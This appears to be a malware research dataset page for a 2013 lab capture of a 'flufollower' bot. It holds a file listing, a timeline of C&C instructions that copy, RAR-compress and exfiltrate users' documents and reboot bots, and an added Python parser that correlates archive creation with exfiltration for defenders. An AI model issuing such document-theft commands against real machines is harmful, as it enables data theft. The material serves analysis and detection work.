| Name | Last modified | Size | Description |
|---|---|---|---|
| Parent Directory | | - | |
| bro/ | 2017-08-31 09:45 | - | |
| 2013-06-08_capture1.capinfos | 2015-10-05 17:26 | 723 | |
| 2013-06-08_capture1.tcpdstat | 2016-12-05 22:28 | 2.2K | |
| README.md | 2015-10-06 11:25 | 4.6K | |
| README.html | 2017-01-14 17:09 | 6.5K | |
| timeline.of.commands.txt | 2015-10-05 20:22 | 9.5K | |
| 2013-06-08_capture1.dnstop | 2015-10-05 17:21 | 18K | |
| 2013-06-08_capture1.passivedns | 2015-10-05 17:21 | 19K | |
| flufollower-bot.exe.zip | 2015-12-16 10:26 | 21K | |
| fast-flux-dga-first-analysis.txt | 2017-01-14 17:09 | 48K | |
| 2013-06-08_capture1.weblogng | 2016-06-15 18:48 | 148M | |
| 2013-06-08_capture1.biargus | 2015-10-05 17:32 | 195M | |
| 2013-06-08_capture1.binetflow | 2015-10-05 17:32 | 207M | |
| 2013-06-08_capture1.pcap | 2015-10-05 20:46 | 1.4G | |
We made several SSH connections to OpenShift for management purposes; they are not part of the infection.
Start of the capture. During the first day we only performed the infection and the C&C connections.
Changed the proxy to squid/3.3.7 because the previous one did not allow us to exfiltrate.
Command 30958 sent.
Copy of documents to a local folder
<instruction type="cp" argumento="C:\Users\Administrator\Documents\*.ppt C:\test\" id_unico_comando="24205" maquina="administrator_0800272508E5"/>
Compression of documents
<instruction type="Rar.exe" argumento="a C:\A1234567890.rar C:\Users\Administrator\Documents\*.pdf" id_unico_comando="8544" maquina="administrator_0800273C8DC9"/>
Exfiltration of documents
<instruction type="getfile" argumento="C:\A1234567890.rar" id_unico_comando="30596" maquina="administrator_0800272508E5"/>
More exfiltration of documents
<instruction type="getfile" argumento="C:\A001.rar" id_unico_comando="9501" maquina="administrator_0800272508E5"/>
Command 27269 sent.
<instruction type="snapshot" argumento="" id_unico_comando="27269" maquina="all"/>
Command to compress documents
<instruction type="Rar.exe" argumento="a C:\A123.rar C:\Users\Administrator\Documents\*.docx" id_unico_comando="277" maquina="administrator_0800273C8DC9"/>
Exfiltration of documents
<instruction type="getfile" argumento="C:\A123.rar" id_unico_comando="2054" maquina="administrator_0800273C8DC9"/>
Command to shut down one bot (argument -r, a restart if passed to the Windows shutdown command)
<instruction type="shutdown" argumento="-r " id_unico_comando="20258" maquina="administrator_08002785477E"/>
Command to shut down another bot (same -r argument)
<instruction type="shutdown" argumento="-r" id_unico_comando="14756" maquina="administrator_0800273C8DC9"/>
Command to list files on all bots
<instruction type="listfiles" argumento="" id_unico_comando="25144" maquina="all"/>
Capture finished
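The C&C instructions in this timeline are single XML elements with four attributes: type (the command), argumento (its argument), id_unico_comando (a command id) and maquina (the target bot, or "all"). The parser and correlation below are an added example written for this page; they are not code from the dataset, from the flufollower bot or from the capture tooling. The instruction lines are copied from the timeline above; the mapping of command types to steps (staging, archive, exfil, recon, reboot) is this editor's reading of the timeline, not a field of the protocol, and the archive-path extraction assumes Rar.exe is always invoked as "a <archive> <sources>", which is the only form the page shows.

```python
"""Parse flufollower C&C <instruction/> elements and correlate archive creation
(Rar.exe) with exfiltration (getfile) per bot.
Added example for this page; not code from the dataset or the bot."""
import xml.etree.ElementTree as ET
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Instruction lines copied verbatim from the timeline on this page. The
# attribute names are the bot's own (Spanish): argumento = argument,
# id_unico_comando = unique command id, maquina = target machine.
INSTRUCTIONS = [
    r'<instruction type="cp" argumento="C:\Users\Administrator\Documents\*.ppt C:\test\" id_unico_comando="24205" maquina="administrator_0800272508E5"/>',
    r'<instruction type="Rar.exe" argumento="a C:\A1234567890.rar C:\Users\Administrator\Documents\*.pdf" id_unico_comando="8544" maquina="administrator_0800273C8DC9"/>',
    r'<instruction type="getfile" argumento="C:\A1234567890.rar" id_unico_comando="30596" maquina="administrator_0800272508E5"/>',
    r'<instruction type="getfile" argumento="C:\A001.rar" id_unico_comando="9501" maquina="administrator_0800272508E5"/>',
    r'<instruction type="snapshot" argumento="" id_unico_comando="27269" maquina="all"/>',
    r'<instruction type="Rar.exe" argumento="a C:\A123.rar C:\Users\Administrator\Documents\*.docx" id_unico_comando="277" maquina="administrator_0800273C8DC9"/>',
    r'<instruction type="getfile" argumento="C:\A123.rar" id_unico_comando="2054" maquina="administrator_0800273C8DC9"/>',
    r'<instruction type="shutdown" argumento="-r " id_unico_comando="20258" maquina="administrator_08002785477E"/>',
    r'<instruction type="shutdown" argumento="-r" id_unico_comando="14756" maquina="administrator_0800273C8DC9"/>',
    r'<instruction type="listfiles" argumento="" id_unico_comando="25144" maquina="all"/>',
]

# Assumed mapping from instruction type to the step it implements on the bot.
# This is the editor's interpretation of the timeline, not part of the protocol.
STAGE = {
    "cp": "staging",       # copy documents into a local folder
    "Rar.exe": "archive",  # compress documents into a .rar
    "getfile": "exfil",    # upload a file to the C&C
    "snapshot": "recon",
    "listfiles": "recon",
    "shutdown": "reboot",  # "-r" is a restart
}


@dataclass
class Instruction:
    kind: str      # type=
    arg: str       # argumento=, stripped of surrounding whitespace
    cmd_id: int    # id_unico_comando=
    machine: str   # maquina= ("all" addresses every bot)

    @property
    def stage(self) -> str:
        return STAGE.get(self.kind, "unknown")

    def archive_path(self) -> Optional[str]:
        """Archive this instruction creates (Rar.exe a <dst> <src>) or
        retrieves (getfile <path>); None for every other type."""
        if self.kind == "Rar.exe":
            toks = self.arg.split()
            if len(toks) >= 2 and toks[0] == "a":
                return toks[1]
            return None
        if self.kind == "getfile":
            return self.arg
        return None


def parse_instruction(xml_line: str) -> Instruction:
    """Parse one <instruction .../> element; raises on any other element."""
    el = ET.fromstring(xml_line)
    if el.tag != "instruction":
        raise ValueError(f"unexpected element <{el.tag}>")
    return Instruction(
        kind=el.attrib["type"],
        arg=el.attrib.get("argumento", "").strip(),
        cmd_id=int(el.attrib["id_unico_comando"]),
        machine=el.attrib["maquina"],
    )


def stage_counts(lines):
    """Per target machine, how many instructions of each step were sent."""
    counts = defaultdict(lambda: defaultdict(int))
    for ins in map(parse_instruction, lines):
        counts[ins.machine][ins.stage] += 1
    return {m: dict(c) for m, c in counts.items()}


def correlate_exfil(lines):
    """For every getfile, report which Rar.exe command(s) built that archive
    and whether they ran on the same bot. A getfile whose archive was built on
    another bot, or by no visible command, deserves a second look."""
    builders = defaultdict(list)  # archive path -> [(cmd_id, machine), ...]
    reports = []
    for ins in map(parse_instruction, lines):
        path = ins.archive_path()
        if ins.kind == "Rar.exe" and path:
            builders[path].append((ins.cmd_id, ins.machine))
        elif ins.kind == "getfile":
            built_by = list(builders.get(path, []))
            reports.append({
                "cmd_id": ins.cmd_id,
                "archive": path,
                "exfil_host": ins.machine,
                "built_by": built_by,
                "same_host": any(m == ins.machine for _, m in built_by),
            })
    return reports


if __name__ == "__main__":
    for host, counts in stage_counts(INSTRUCTIONS).items():
        print(host, counts)
    for rep in correlate_exfil(INSTRUCTIONS):
        print(rep)
```

Run against the timeline's own instructions, the correlation shows that getfile 2054 retrieves an archive built by command 277 on the same bot, whereas getfile 30596 retrieves C:\A1234567890.rar from administrator_0800272508E5 although the only visible Rar.exe that builds that path (command 8544) targeted administrator_0800273C8DC9, and C:\A001.rar (getfile 9501) has no visible creation command at all. The timeline refers to commands 30958 and 27269 by id only, so these gaps may simply be commands not reproduced on this page; the point of the check is that exfiltration of an archive no visible command produced is exactly what a defender replaying C&C traffic should be flagging.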